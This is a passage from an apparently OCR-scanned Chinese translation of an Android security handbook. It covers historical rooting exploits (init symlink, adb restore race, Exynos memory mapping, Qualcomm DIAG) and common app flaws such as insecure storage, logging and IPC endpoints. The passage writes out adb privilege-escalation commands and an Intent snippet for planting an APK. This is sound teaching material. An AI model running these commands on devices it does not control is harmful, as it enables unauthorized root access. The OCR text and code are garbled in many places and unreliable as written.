3.6.11 文件 权限 和 符号 链接 相关 的 攻击 


许多 设备 中 存在 大 量 与 文件 权限 和 符号 链接 相关 的 攻击 。 其 中 大 多 数 是 由 OEM 厂商 的 特定 
修改 引入 的 , 并 不 存在 于 Android 官方 版 本 中 。Dan Rosenberg 发 现 了 许多 这 类 漏洞 ,并 在 他 的 博 
客 (http:/vulnfactory.org/blog/ ) 中 提供 了 对 大 量 设备 的 创新 性 root 方 法 。 

Android 4.0 的 最 初版 本 在 do_chmod mkqir 和 do_chown 的 初始 化 函数 中 曾经 有 一 个 bug， 
即使 它们 目标 路 径 的 最 后 一 个 元 素 是 一 个 符号 链接 , 它们 也 可 以 应 用 特定 的 属 主 和 文件 权限 。 基 
些 Android 设备 的 initrc 脚本 中 有 以 下 一 行 代码 。 

mkdir /data/local/tmp 0771 shell shell 

你 可 能 想到 ， 如 果 /data/local 目录 对 于 用 户 或 用 户 组 的 shell 是 可 写 的 ， 那 么 你 就 可 以 利用 这 
个 漏洞 来 使 得 /data 目录 可 写 ， 只 需要 将 /data/local/tmp 替换 成 一 个 指向 /data 的 符号 链接 ,然后 重启 
设备 。 在 重启 之 后 ， 你 就 可 以 创建 或 修改 /data/local.prop 文件 ， 并 将 ro .kernel .qemu 的 属性 值 
设 为 1。 

利用 这 一 安全 漏洞 的 指令 如 下 : 

adb shell rm -r /data/local/tmp 

adb shell ln -s /data/ /data/local/tmp 

adb reboot 


adb shell "echo 'ro.kernel.gemu=1' > /data/local .prop" 
adb reboot 


这 个 安全 漏洞 的 男 外 一 个 流行 利用 程序 变种 是 将 /data/local/tmp 链接 到 系统 分 区 ， 然 后 使 用 
debugfs 来 写 入 su 二进制 程序， 并 让 它 成 为 set-uid root 程序 。 举 个 例子 ， 运 行 Android 4.0.3 的 华 
硕 Transformer Prime 平板 电脑 可 以 被 这 一 利用 攻击 。 

Android 4.2 版 本 的 init 脚本 中 应 用 了 o_NoFOLLOWW 语义 ， 以 防止 这 类 符号 链接 攻击 。 


3.6.12 adb 恢复 过 程 竞 争 条 件 漏 洞 


Android 4.0 引入 了 通过 aqpb backup 命令 进行 设备 完全 备份 的 能 力 ， 这 个 命令 将 所 有 数据 
和 应 用 备份 到 一 个 backup.ab 文件 〈 这 是 个 预先 设计 好 头 部 结构 的 TAR 压缩 文件 )。 而 adb 
restore 命令 是 用 来 恢复 数据 的 。 
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在 恢复 过 程 的 初始 实现 中 存在 两 个 安全 漏洞 ( Android 4.1.1 中 已 经 修复 )。 第 一 个 安全 漏洞 
是 创建 的 文件 与 目录 可 由 其 他 应 用 访问 。 第 二 个 安全 漏洞 是 允许 从 以 特殊 UID ( 如 system 身份 ) 
运行 的 软件 包 恢复 文件 集 ， 而 缺少 一 个 特殊 的 备份 代理 来 处 理 恢复 过 程 。 

为 了 利用 这 两 个 安全 漏洞 ，Andreas Makris ( Bin4ry ) 创建 了 一 个 特制 的 备份 文件 ， 该 文件 
有 一 个 全 局 可 读 、 可 写 、 可 执行 的 目录 , 其 中 包含 100 个 文件 , 每 个 文件 的 内 容 都 是 ro .kernel . 
qemu=1 和 ro.secure=0。 当 这 个 文件 的 内 容 被 写 到 /data/local.prop 文件 中 , 它 将 使 得 adbd 在 启 
动 时 以 root 权限 运行 。 原 始 的 利用 程序 可 以 从 http:/forum.xda-developers.com/ showthread.php?t= 
1886460 下 载 。 

如 果 在 aqp 恢复 命令 运行 时 执行 的 话 ,下 面 这 行 代码 会 导致 备份 管理 服务 的 恢复 进程 与 shell 
用 户 的 while 循环 构成 一 个 竞争 条 件 : 


adb shell "while ! ln -s /data/local.prop \ 
/data/data/com.android.settings/a/file99; do :; done" 


如 果 while 循环 在 恢复 进程 恢复 file99 文件 之 前 创建 了 符号 链接 ,那么 恢复 进程 将 随 着 这 个 
符号 链接 将 只 读 的 系统 属性 写 人 /data/local.prop 文 件 , 这 让 adbd 在 下 一 次 重启 后 以 root 身份 运行 。 
























































3.6.13 Exynos4: exynos-abuse 











这 个 安全 漏洞 存在 于 三 星 的 内 核 驱动 中 ， 影 响 使 用 Exynos 4 处 理 器 的 设备 。 基 本 上 ， 任 何 
应 用 都 可 以 访问 /dev/exynosmemm 设备 文件 ， 这 人 允许 以 读 写 权限 映射 所 有 的 物理 内 存 。 

该 漏洞 是 alephzain 发 现 的 ， 他 编写 了 exynos-abuse 利用 程序 来 进行 演示 ， 并 公布 在 
XDA-developers 论坛 上 。 原 帖 地 址 为 http://forum.xda-developers.com/showthread.php?t=2048511。 

首先 ， 这 个 利用 程序 映射 内 核 内 存 ， 然 后 对 处 理 /proc/kallsyms 函数 的 格式 化 字符 串 进 
行 修 改 ， 以 绕 过 kptr_restrict 内 存 缓解 机 制 。 然 后 它 解析 /proc/kallsyms ， 找 到 sys_setresuiqd 
系统 调用 处 理 程序 的 地 址 ,找到 之 后 ， 它 会 对 函数 进行 修补 ， 以 移 除权 限 检查 ,并 在 用 户 空间 执 
行 setresuid 系统 调用 以 成 为 root。 最 后 , 它 撤销 对 内 核 内 存 进行 的 修改 ,并 执行 一 个 root shell。 
后 来 ，alephzain 创建 了 一 个 名 为 Framaroot 的 一 键 root 应 用 。Framaroot 舱 和 人 了 原始 漏洞 的 3 
个 利用 变种 ， 每 个 利用 都 允许 没有 特权 的 用 户 映 射 任意 物理 内 存 。 这 个 一 键 root 应 用 对 基 
Exynos4 世 片 组 和 基于 TIOMAP3 芯片 组 的 设备 都 适用 。 最 值得 一 提 的 是 ，alephzain 发 现 ， 三 星 
没有 正确 地 修补 这 个 Exynos4 漏洞 ， 于 是 他 在 Framaroot 中 能 人 了 一 个 新 的 利用 程序 ， 利 用 在 三 
星 修补 代码 中 存在 的 整数 溢出 漏洞 。 这 人 允许 绕 过 额外 验证 并 再 次 覆盖 内 核 内 存 。 这 些 新 的 漏洞 利 
用 被 alephzain 悄悄 地 包含 进 Farmaroot 中 ， 后 来 被 Dan Rosenberg 发 现 并 公布 于 http://blog. 
azimuthsecurity.com/2013/02/re-visiting-exynos-memory-mapping-bug.html。 
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3.6.14 Diag: lit/diaggetroot 


















































这 个 安全 漏洞 是 由 giantpune 发 现 的 ， 被 编号 为 CVE-2012-4220: 
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Android 2.3 至 4.2 版 本 中 高 通 创新 中 心 ( QuIC ) 的 诊断 ( 即 DIAG ) 内 核 模式 驱动 
的 diagchar_core.c, 允许 攻击 者 通过 一 个 在 本 地 diagchar_ioct1 调用 中 使 用 特殊 构 参 
数 的 应 用 ， 执 行 任意 代码 或 者 造成 拒绝 服务 (不 正确 的 指针 引用 )。 











lit 利用 程序 使 用 这 一 安全 漏洞 ， 使 内 核 执行 用 户 空间 内 存 中 的 原始 代码 。 通 过 从 
/sys/class/leds/lcd-backlight/reg 文件 读 取 , 可 以 使 内 核 处 理 用 户 空间 内 存 中 的 数据 结构 。 在 这 一 处 
理 流 程 中 ， 它 调用 了 其 中 一 个 数据 结构 中 的 函数 指针 ， 从 而 导致 了 权限 提升 。 

针对 HTC J Butterly 设备 的 diaggetroot 利用 程序 也 使 用 了 这 个 安全 漏洞 ， 然 而 ， 在 这 个 设备 
上 ， 存 在 漏洞 字符 的 设备 只 允许 radio 用 户 或 用 户 组 访问 。 为 了 打破 这 一 限制 ， 研 究 者 使 用 了 一 
个 Content Provider 来 获取 设备 的 打开 文件 描述 符 。 利 用 这 种 方法 获取 root 权限 只 在 组 合 使 用 这 
两 种 技术 时 才 是 可 行 的 。 可 以 从 https://docs.google.com/file/d/0B8LDObFOpzZqQzducmxjRExXNn 
M/edit?pli=1 下 载 到 这 个 利用 程序 。 












































3.7 ”小结 


对 Android 设备 进行 root， 可 以 让 你 获得 Android 设备 的 完全 控制 。 然 而 ， 如 果 你 不 采取 任 
何 预防 措施 来 修补 获得 root 访问 权限 的 开放 通道 ， 那 么 系统 安全 可 以 轻易 地 被 攻击 者 损害 。 

本 章 介 绍 了 理解 root 过 程 的 关键 概念 , 包括 通过 合法 的 引导 加 载 程序 解锁 的 方法 , 如 在 那些 
引导 加 载 程序 未 加 锁 设 备 上 的 方法 ， 以 及 允许 在 一 个 引导 加 载 程序 已 加 锁 设 备 上 获取 和 持久 化 
root 访问 的 其 他 方法 。 最 后 ， 你 看 到 了 在 过 去 几 年 里 用 来 root 许多 Android 设备 的 知名 root 提 权 
利用 程序 。 

下 一 章 将 深入 探讨 Android 应 用 的 安全 性 ， 将 介绍 影响 Android 应 用 的 普通 安全 问题 ， 并 演 
示 如 何 使 用 免费 、 公 开 的 工具 来 进行 应 用 安全 评估。 
































应 用 安全 性 评估 


























应 用 安全 甚至 在 Android 出 现 之 前 就 已 经 是 一 个 热点 领域 。 在 Web 应 用 火爆 的 时 代 , 开发 者 
争先 恐 后 地 快速 开发 应 用 而 忽视 基本 的 安全 实践 , 或 者 使 用 没有 足够 的 安全 控制 的 框架 。 在 移动 
应 用 时 代 ， 历 史 仍 然 在 重演 。 本 章 将 首先 讨论 Android 应 用 中 的 一 些 普遍 性 安全 问题 ， 然 后 将 演 
示 使 用 通用 工具 挖掘 和 利用 应 用 安全 漏洞 。 


4.1 普遍 性 安全 问题 


与 传统 应 用 安全 领域 类 似 , 移动 应 用 中 也 有 几 类 安全 问题 频繁 出 现在 安全 评估 和 漏洞 测试 报 
告 中 。 这 些 安全 问题 从 敏感 信息 泄露 ， 到 最 严重 的 代码 或 指令 执行 漏洞 。Android 应 用 并 不 对 这 
些 安全 漏洞 免疫 ， 只 是 到 达 这 些 漏洞 的 攻击 面 与 传统 应 用 有 些 差别 。 

本 节 将 涵盖 在 Android 应 用 安全 测试 和 公开 研究 中 经 常 发 现 的 几 类 安全 问题 , 但 肯定 不 是 个 
完整 列表 。 随 着 应 用 安全 开发 实践 的 日 益 普 及 ， 以 及 Android 自身 应 用 编程 接口 (API ) 的 改进 ， 
很 可 能 会 出 现 新 的 安全 漏洞 ， 甚 至 是 新 的 安全 漏洞 类 型 。 


4.1.1 应 用 权限 问题 


在 现 有 Android 权限 模型 的 粒度 下 ， 开 发 者 有 可 能 会 申请 比 应 用 实际 所 需 更 多 的 权限 ， 导 
致 这 一 结果 的 部 分 原因 可 能 是 权限 执行 与 文档 中 的 不 一 致 。 尽 管 开发 者 参考 文档 中 描述 了 给 定 
类 与 方法 的 绝 大 多 数 权限 要 求 ， 但 是 它们 并 不 是 100% 完 整 或 100% 准 确 的 。 研 究 团队 已 经 尝试 
用 各 种 办 法 识别 其 中 的 不 一 致 性 。 例 如 ，2012 年 ， 研 究 人 员 Andrew Reiter 和 Zach Lanier 尝试 
映射 出 Android 开源 项 目 (AOSP ) 中 可 用 Android API 的 权限 要 求 ， 结 果 却 得 出 了 关于 不 一 臻 
性 的 一 些 有 趣 结论 。 

他 们 发 现 ，wiFiManager 类 的 一 些 方法 的 文档 与 实现 存在 着 不 一 致 性 。 例 如 ， 开 发 者 文 
档 没有 对 startscan 方法 提 到 权限 要 求 。 图 4-1 显示 了 Android 开发 者 文档 中 这 一 方法 的 屏 
幕 截 图 。 
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public boolean startScan () Since: APILevel 1 


Request a scan for access points. Returns immediately. The availability of the results is made known later by 
means of an asynchronous event sent on completion of the scan. 


Returns 
true if the operation succeeded, i.e., the scan was initiated 


图 4-1 startscan 国 数 的 文档 


而 这 与 该 方法 (在 Android 4.2 版 本 中 ) 的 实际 源 代 码 存在 差异 ， 源 代码 显示 会 调用 
enforcecallingorSelfPermission 图 数 , 而 该 图 数 会 通过 enforcechangePermission 凶 


数 ， 检 查 调用 者 是 否 具 有 ACCESS_WIFI_STATE 权限 。 a 


























public void startScan(boolean forceActive) { 
enforceChangePermission(); 
mWifiSstateMachine.startScan(forceActive); 
noteScanSstart (); 


} 


private void enforceChangePermission() { 
mContext .enforceCallingOrSelfPermission(android.Manifest. 
permission.CHANGE WIFI_STATE, 
"WifiService"); 


} 
还 有 一 个 例子 是 TelephonyManager 类 的 getNeighboringCellIinfo 方法 ， 文档 中 指出 


需要 ACCESS_COARSE_UPDATES 权限 ,图 4-2 中 显示 了 Android 开发 者 文档 中 这 一 方法 的 屏幕 截 
图 。 








和 











public List<NeighboringCelllnfo> getNeighboringCellinfo () 
Returns the neighboring cell information of the device. 


Returns 


List of NeighboringCellinfo or null if info unavailable. 
Requires Permission: (@link android.Manifest.permission#ACCESS_COARSE_UPDATES} 














图 4-2 getNeighboringCellInfo 图 数 的 文档 


然而 , 仔细 查看 实现 了 Telephony 接口 的 PhoneInterfaceManager 类 源码 ( Android 4.2 
版 本 中 )， 你 会 看 到 getNeighboringCellInfo 方法 实际 上 检查 了 ACCESS_FINE_LOCATION 
或 ACCESS_COARSE_LOCATION 权限 是 否 存 在 , 而 文档 中 指出 的 不 是 这 两 个 权限 , 反而 是 一 个 根 
本 不 存在 的 权限 。 


public List<NeighboringCellInfo> getNeighboringCellInfo() { 
tr 
mApp.enforceCallingOrSelfPermission!( 
android.Manifest.permission.ACCESS_FINE LOCATION, 
rl ye 
} catch (SecurityException e) { 
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/ /如果 我 们 有 ACCESS_FINE_LOCATION 权限 ， 请 忽略 对 ACCESS_COARSE_LOCRATION 的 检查 
// 错误 会 从 ACCESS_CORARSE_LOCRATION 抛 出 安全 异常 ， 因 为 这 是 较 弱 的 先决 条 件 
mApp.enforceCallingOrSelfPermission( 
android.Manifest.permission.ACCESS_ COARSE LOCATION, null); 
} 


这 种 类 型 的 疏忽 ， 尽 管 可 能 看 起 来 无 伤 大 雅 , 但 经 常会 给 开发 者 带 来 不 佳 的 实践 ,也 就 是 权 
限 申请 不 足 ， 或 者 会 造成 更 坏 后 果 的 权限 申请 过 度 。 在 权限 申请 不 足 的 情况 下 ， 经 常会 导致 可 靠 
性 或 功能 性 的 问题 ， 如 果 对 安全 异常 未 进行 处 理 ， 就 会 导致 应 用 骨 泪 。 而 对 于 权限 申请 过 度 ,， 更 
多 的 是 安全 性 问题 , 想象 一 个 充满 漏洞 并 过 度 申 请 权限 的 应 用 被 一 个 恶意 应 用 所 攻击 , 经常 导致 
权限 提升 的 情形 。 

关于 权限 映射 研究 的 更 多 信息 ， 请 参考 http://www.slideshare.net/quineslideshare/mapping- 
and-evolution-of-android-permissions。 

在 分 析 Android 应 用 是 否 存在 过 度 申请 权限 的 情况 时 ， 比 较 应 用 申请 的 权限 与 应 用 的 功能 意 
图 是 非常 关键 的 。 一 些 特定 的 权限 ,如 cAMERA 和 SEND_SMS 等 , 对 于 第 三 方 应 用 往往 是 不 必要 
的 。 想 要 得 到 这 些 权限 对 应 的 功能 ,完全 可 以 通过 调用 照相 机 或 短信 息 应 用 来 实现 ， 让 它们 来 处 
理 任务 ,， 这 有 助 于 增加 用 户 交互 的 安全 性 。4.2 节 将 展示 在 应 用 的 各 种 组 件 中 ， 这 些 权限 的 实际 
应 用 位 置 。 


4.1.2 ”敏感 数据 的 不 安全 传输 


由 于 受到 经 常 性 的 关注 与 审查 ， 确 保 传输 安全 性 的 通用 方法 (如 使 用 SSL、TLS 协议 等 ) 基 
本 得 到 了 广泛 的 认 知 。 然 而 遗憾 的 是 ,这些 方 法 在 移动 应 用 中 并 没有 得 到 全 面 的 应 用 ,这 或 许 是 
由 于 开发 者 对 于 如 何 正确 实现 SSL/TLS 还 缺少 了 解 ， 或 者 只 是 开发 者 持 有 不 正确 的 观念 :“ 如 果 
通过 运营 商 的 网 络 进行 通信 ， 那 就 是 安全 的 。” 移动 应 用 开发 者 有 时 并 没有 对 传输 中 的 敏感 数据 
进行 安全 保护 。 

这 类 安全 问题 通常 以 如 下 的 一 种 或 多 种 方式 出 现 : 

口 弱 加 密 或 没有 加 密 ; 

口 强加 密 ， 但 缺少 对 安全 警告 或 证 书 验证 错误 的 处 理 ; 

口 在 安全 协议 失效 后 使 用 明文 ; 

口 在 不 同 网 络 类 型 ( 如 移动 连接 与 Wi-Fi ) 上 的 传输 安全 使 用 上 的 不 一 致 。 

发 现 不 安全 传输 问题 就 像 监 听 目 标 设备 的 流量 一 样 简单 。 构建 一 个 中 间 人 设备 的 详细 过 程 已 
经 超出 了 本 书 的 范围 ， 但 是 有 大 量 的 工具 和 教程 可 以 帮助 你 完成 这 个 任务 。Android 模拟 器 支持 
对 网 络 流量 进行 代理 , 以 及 支持 将 流量 转 储 为 PCAP 格式 的 网 络 数据 文件 。 你 可 以 分 别 通过 传递 
-http-proxy 或 -tcpdump 选项 来 完成 这 些 功 能 。 

不 安全 数据 传输 的 一 个 突出 的 公开 例子 是 ，Google ClientLogin 身份 认证 协议 在 Android 2.1 
至 2.3.4 版 本 某 些 组 件 中 的 实现 。ClientLogin 协议 允许 应 用 请 求 用 户 的 Google 账户 认证 令 牌 , 然 
后 后 者 可 以 被 复 用 ， 以 处 理 指 定 服务 API 的 后 续 事 务 。 

2011 年 ， 德 国 乌 尔 姆 大 学 的 研究 者 发 现 ，Android 2.1 至 2.3.3 版 本 的 日 历 与 联系 人 应 用 ， 以 
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及 Android 2.3.4 版 本 上 的 Picasa Sync 服务 通过 明文 HTTP 协议 发 送 Google ClientLogin 认 证 令 牌 。 
这 一 令 牌 被 攻击 者 获得 后 ,可 以 被 重用 来 假冒 成 用 户 。 因 为 有 大 量 现成 的 工具 与 技术 支持 在 Wi-Fi 
网 络 中 执行 中 间 人 攻击 ， 因 此 对 这 一 令 牌 进行 劫持 非常 简单 ， 而 这 对 通过 不 安全 或 不 受信 任 的 
Wi-Fi 网 络 上 网 的 用 户 来 说 是 个 坏 消 息 。 

关于 乌 尔 姆 大 学 发 现 的 Google ClientLogin 安全 漏洞 的 更 多 信息 ， 人 参见 http:/www.uni-ulm. 
de/en/in/mi/staff/koenings/catching-authtokens.html。 


4.1.3 不 安全 的 数据 存储 


Android 为 数据 存储 提供 了 多 种 标准 支持 ， 包 括 共享 配置 文件 ( Shared Preferences )、SQLite 
数据 库 和 原始 文件 。 另 外 , 每 种 存储 类 型 还 能 以 多 种 方式 创建 和 访问 ,包括 通过 受 管 理 代码 或 原 
生 代 码 ， 或 者 通过 类 似 于 Content Providers 的 结构 化 接口 。 最 普遍 的 错误 包括 对 敏感 数据 的 明文 
存储 、 未 受 保护 的 Content Providers 接口 ( 稍 后 讨论 )， 以 及 不 安全 的 文件 权限 。 

一 个 同时 存在 明文 存储 和 不 安全 文件 权限 两 种 安全 问题 的 案例 是 Android 版 的 Skype 客户 
端 ， 这 个 问题 被 于 2011 年 4 月 被 发 现 ， 由 Justin Case (jcase ) 在 http://AndroidPolice.com 网 站 上 
发 布 ,这 个 Skype 应 用 创建 了 许多 拥有 全 局 可 读 和 全 局 可 写 权限 的 文件 ,如 SQLite 数据 库 和 XML 
文件 等 。 另外， 这些 内 容 是 没有 经 过 加 密 的 ， 而 且 还 包含 了 配置 数据 和 即时 通信 上 日志。 以 下 显示 
了 jcase 自己 手机 上 Skype 应 用 的 数据 目录 ， 以 及 部 分 文件 内 容 。 

























































































# ls -1 /data/data/com.skype.merlin mecha/files/jcaseap 

-rw-rw-rw- app_152 app_152 331776 2011-04-13 00:08 main.db 
-rw-rw-rw- app_152 app_152 119528 2011-04-13 00:08 main.db-journal 
-rw-rw-rw- app_152 app_152 40960 2011-04-11 14:05 keyval.db 
-rw-rw-rw- app_152 app_152 3522. .2011-04-12. 23:39. Config .xml 
drwxrwxrwx app_152 app_152 2011-04-11 14:05 voicemail 
-rw-rw-rw- app_152 app_152 0 2011-04-11 14:05 config.lck 
-rw-rw-rw- app_152 app_152 61440 2011-04-13 00:08 bistats.db 
drwxrwxrwx app_152 app_152 2011=04=12 21:49 chatsynce 
-rw-rw-rw- app_152 app_152 12824 2011-04-11 14:05 keyval.db-journal 
-rw-rw-rw- app_152 app_152 33344 2011-04-13 00:08 bistats.db-journal 
# grep Default /data/data/com.skype.merlin mecha/files/shared.xml 








<Default>jcaseap</Default> 
先 抛 开 明文 存储 问题 不 说 , 不 安全 的 文件 权限 起 因 于 一 个 之 前 不 太 为 人 所 知 的 Android 原生 
文件 创建 问题 。 通过 Java 接口 创建 的 SQLite 数据 库 、 共 享 配置 文件 和 原始 文件 都 使 用 0660 的 文 
件 权限 , 这 使 得 文件 对 于 所 属 的 用 户 ID 和 用 户 组 ID 都 是 可 读 写 的 , 然而 当 通过 原生 代码 或 外 部 
指令 创建 文件 时 , 应 用 进程 会 继承 其 父 进程 Zygote 的 文件 权限 扼 码 000”, 这 意味 着 全 局 可 读 写 。 
Skype 客户 端 使 用 原生 代码 来 实现 它 的 绝 大 多 数 功 能 ， 包 括 创 建 这 些 文件 并 与 之 进行 交互 。 
































@ 对 应 的 文件 权限 为 777。 一 一 译 者 注 








68 第 4 章 应 用 安全 性 评估 





注意 ”Android 4.1 版 本 之 后 ,Zygote 进程 的 文件 权限 掩 码 已 经 被 设置 到 一 个 更 加 安全 的 值 077”。 
关于 这 一 变化 的 详细 信息 将 在 第 12 章 中 说 明 。 


关于 jcase 发 现 的 Skype 安全 漏洞 的 详细 信息 ， 请 参考 http://www.androidpolice.com/2011/04/ 
14/exclusive-vulnerability-in-skype-for-android-is-exposing-your-name-phone-number-chat-logs-and- 
a-lot-more/。 


4.1.4 通过 日 志 的 信息 泄露 


Android 日 志 是 信息 泄露 的 一 个 主要 途径 ， 通 过 开发 者 对 日 志方 法 的 滥用 (通常 是 出 于 调试 
目的 )， 应 用 可 能 会 记录 下 包括 普通 的 诊断 消息 、 登 录 凭证 或 其 他 敏感 数据 的 任何 信息 。 其 至 系 
统 进程 ， 如 ActivityManager， 也 会 对 Activity 调用 的 详细 信息 进行 记录 。 带 有 READ_LOGS 权限 
的 应 用 通过 1ogcat 命令 就 可 以 获得 对 这 些 日 志 消 息 的 访问 权 。 
























































注意 READ_LOGS 权限 在 Android 4.1 版 本 之 后 不 再 对 第 三 方 应 用 开放 ， 然而 ,对 于 更 老 的 版 本 
以 及 被 root 的 设备 ， 第 三 方 应 用 仍 有 可 能 获取 到 这 一 权限 和 对 logcat 命令 的 访问 。 











作为 ActivityManager 日 志 消 息 粒 度 的 一 个 示例 ， 可 以 看 如 下 日 志 消息 片段 : 


I/ActivityManager (13738): START {act=android.intent.action.VIEW 
dat=http://ww.wiley.com/ 
cmp=com.google.android.browser/com.android.browser.BrowserActivity 

(has extras) u=0} from pid 11352 

I/ActivityManager (13738): Start proc com.google.android.browser for 
activity com.google.android.browser/com.android.browser.BrowserActivity: 
pid=11433 uid=10017 gids={3003, 1015, 1028} 


你 可 以 看 到 官方 浏览 带 正 在 被 调用 ,或许 是 由 用 户 在 一 封 电子 邮件 或 一 条 短信 中 点 击 链 接 而 
触发 的 。 被 传递 Intent 的 详细 信息 也 可 以 清楚 看 到 ， 包 括 用 户 正在 访问 的 URL ( http:/www. 
wiley.com/ )。 尽 管 这 个 小 例子 看 起 来 并 不 是 个 严重 的 问题 , 但 是 在 某 种 环境 下 ,这 代表 有 可 能 获 
取 到 用 户 的 上 网 信息 。 

一 个 关于 过 度 日 志 更 具有 说 服 力 的 案例 发 生 在 Android 版 的 Firefox 浏览 器 中 。2012 年 12 月 ， 
Neil Bergman 在 Mozilla bug 跟踪 器 上 报告 了 这 个 安全 问题 Android 版 的 Firefox 浏览 器 记录 了 浏 
览 行为 ， 包 括 访问 的 URL。 在 某 种 情况 下 ， 还 可 能 会 包括 一 些 会 话 标识 符 ，Neil 在 他 的 安全 问 
题 报告 条 目 中 指出 这 一 问题 ， 并 加 上 了 logcat 命令 的 输出 结 

I/GeckoBrowserApp (17773): Favicon successfully loaded for URL = 

https://mobile.walmart.com/pharmacy;jsessionid=83CB330691854B071CD172D41DC2C3 

AB 


I/GeckoBrowserApp (17773): Favicon is for current URL = 
https://mobile.walmart.com/m/pharmacy;jsessionid=83CB330691854B071CD172D41DC2C3 

















Qz 对 应 的 文件 权限 为 700。 一 一 译 者 注 








AB 

E/GeckoConsole(17773): [JavaScript Warning : "Error in parsing Value for 
'background'. Declaration dropped." {file: 

"https://mobile.walmart.com/m/pharmacy;jsessionid=83CB330691854B071CD172D41DC2C 

3AB?wicket :bookmarkablePage=:com.wm.mobile.web.rx.privacy.PrivacyPractices" 

line: 0}] 


在 这 个 案例 中 , 一 个 拥有 日 志 访 问 权限 的 恶意 应 用 可 能 截获 这 些 会 话 标 识 符 , 并 劫持 用 户 在 
远程 Web 应 用 上 的 会 话 。 关 于 这 一 问题 的 更 多 详情 ， 参 见 Mozilla bug 跟踪 器 ， 网 址 为 
https://bugzilla. mozilla.org/show_ bug.cgi?1d=825685。 














4.1.5 不 安全 的 IPC 端点 


常用 的 进程 间 通 信 (1IPC ) 端点 包括 Service、Activity、Broadcast Receiver 和 Content Provider， 
而 作为 潜在 的 攻击 面 ， 这 些 IPC 端点 经 常 被 忽视 。 这 些 IPC 端点 同时 作为 数据 源 和 数据 目的 池 ， 
如 何 与 它们 进行 交互 主要 取决 于 它们 的 实现 , 而 对 于 是 不 是 对 它们 的 滥用 也 要 看 它们 的 用 途 。 在 
最 基本 的 层次 上 ,对 于 这 些 接口 的 防护 通常 通过 应 用 权限 来 达成 , 包括 标准 权限 和 和 定制 权限 。 举 
例 来 说 , 一 个 应 用 可 以 定义 一 个 IPC 端点 只 能 由 这 个 应 用 中 的 其 他 组 件 访问 ,或 者 只 能 由 请 求 了 

痢 定 权限 的 其 他 应 用 访问 。 

在 了 PC 端点 没有 被 恰当 地 进行 安全 防护 , 或 者 在 一 个 恶意 应 用 请 求 并 被 授予 了 所 要 求 的 权限 
时 ， 对 于 每 种 端点 有 一 些 特定 的 考虑 。Content Provider 在 设计 上 就 暴露 了 对 结构 化 数据 的 访问 ， 
因此 可 能 遭遇 一 系列 攻击 ， 比 如 注入 或 者 目录 遍历 。Activity ， 作 为 面向 用 户 的 组 件 ， 可 能 会 被 
恶意 应 用 用 来 进行 界面 伪装 ( UI-redressing ) 攻击 。 

Broadcast Receiver 经 常 被 用 来 处 理 隐 式 Intent 消息 ,或 系统 范围 事件 等 拥有 宽松 标准 的 Intent 
消息 。 例 如 ， 接 收 到 一 条 新 短 消息 后 ，Telephony 子 系统 会 广播 一 个 拥有 SMS_RECEIVED 动作 的 
隐 式 Intent， 而 带 有 匹配 这 一 动作 的 Intent 过 滤器 的 注册 Broadcast Receiver 将 收 到 这 条 消息 。 然 
而 Intent 过 滤器 的 优先 级 属性 ( 不 限于 Broadcast Receiver ) 可 以 决定 隐 式 Intent 发 送 的 先后 次 序 ， 
这 会 导致 潜在 的 对 广播 消息 的 劫持 或 拦截 。 












































注意 ” 隐 式 Intent 是 那些 没有 指定 特定 目标 组 件 的 Intent， 而 显 式 Intent 则 以 一 个 特定 的 应 用 和 
组 件 作 为 接收 目标 ， 如 com.wiley.exampleapp.SomeActivity。 


如 第 2 章 所 述 ，Service 是 应 用 进行 后 台 处 理 的 组 件 。 类 似 于 Broadcast Receiver 和 Activity， 
与 Service 的 交互 也 是 使 用 Intent 完成 的 ， 这 包括 启动 Service 、 停 止 Service 和 绑 定 Service 等 动 
作 。 一 个 绑 定 后 Service 可 能 会 向 其 他 应 用 暴露 出 与 应 用 相关 的 男 一 层次 功能 ， 因 为 这 些 功 能 都 
是 定制 的 ， 开 发 者 也 可 能 暴露 出 一 个 可 以 执行 任意 命令 的 方法 。 

一 个 利用 未 受 保护 IPC 接口 的 潜在 影响 的 案例 是 ，Andre “sh4ka” Moulu 在 三 星 Galaxy S3 
上 的 Kies 应 用 中 发 现 的 安全 漏洞 。sh4ka 发 现 Kies 是 一 个 拥有 很 高 权限 (包括 INSTALL 
PACKAGES 权限 ) 的 系统 应 用 ， 它 有 一 个 Broadcast Receiver 组 件 ， 用 于 恢复 /sdcard/restore 目录 
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下 的 应 用 包 (APK )。 下 面 的 代码 片段 是 


{ 


if (paramIntent .getAction() .toString () 
"com.intent.action.KIES_START_ RESTORE_APK")) 
{ 





kies_start.m nKiesActionEvent = 
int i3 = Log.w("KIES_START", 
"KIES_ACTION_EVENT_SZ_START_RESTORE_APK");} 


上 9 








byte[] arrayOfBytell = new bytel[6]; 
byte[] arrayOfByte12 = 

bytel] 

byte[] arrayOfByte14 = 

int i4 = arrayOfBytel3.length; 


System.arraycopy (arrayOfBytel3, 


0, arrayOfBytel4, 0, 














sh4ka 对 Kies 应 用 的 反 编 译 。 


public void onReceive (Context paramContext, 





Intent paramIintent) 


.equals ( 


paramIntent .getByteArrayExtral("head"); 
arrayOfBytel3 = ParamIntent .getByteArrayExtral("body"); 
new bytel[larrayOfBytel3.1length]; 


14); 


StartKiesService(paramContext, arrayOfBytel2, arrayOfBytel4); 


return; 


} 





在 上 面 这 段 代 码 中 你 可 以 看 到 ，onReceive 方法 接收 一 个 Intent， 


getAction 函数 会 检查 paraIntent 的 Action 值 是 否 为 KIES_START_RESTORE_， 


即 paramintento 调用 


APK， 如 果 











为 true, 方法 将 从 paramIntent 中 提取 出 几 个 extra 值 (包括 head 和 body ), 然后 调用 start 
KiesService。 调用 链 最 终 会 导致 Kies 应 用 对 /sdcard/restore 进行 递归 遍历 , 安装 里 面 的 每 个 APK。 
为 了 将 自己 的 APK 在 没有 任何 权限 的 情况 下 放置 在 /sdcard/restore 目录 中 , sh4ka 利用 了 另 一 








个 可 获取 WRITE_EXTERNAL_STORAGE 权限 的 安全 漏洞 。 在 他 的 漏洞 报告 “From 0 perm app to 
INSTALL PACKAGES” 中 ，sh4ka 利用 了 三 星 Galaxy S3 手机 上 的 clippboardSaveService 服 


务 。 以 下 代码 片段 演示 了 这 一 漏洞 利用 。 


Intent intentCreateTemp = 
CLIPBOARD_SAVE_SERVICE" ) ; 
intentCreateTemp .putExtra("copyPath", 
"/files/avast.apk"); 

intentCreateTemp .putExtra("pastePath", 


new Intent ("com.android.clipboardsaveservice. 


"/data/data/"+getPackageName ()+ 


"/data/data/com.android.clipboardsaveservice/temp/"); 


startService(intentCreateTemp); 


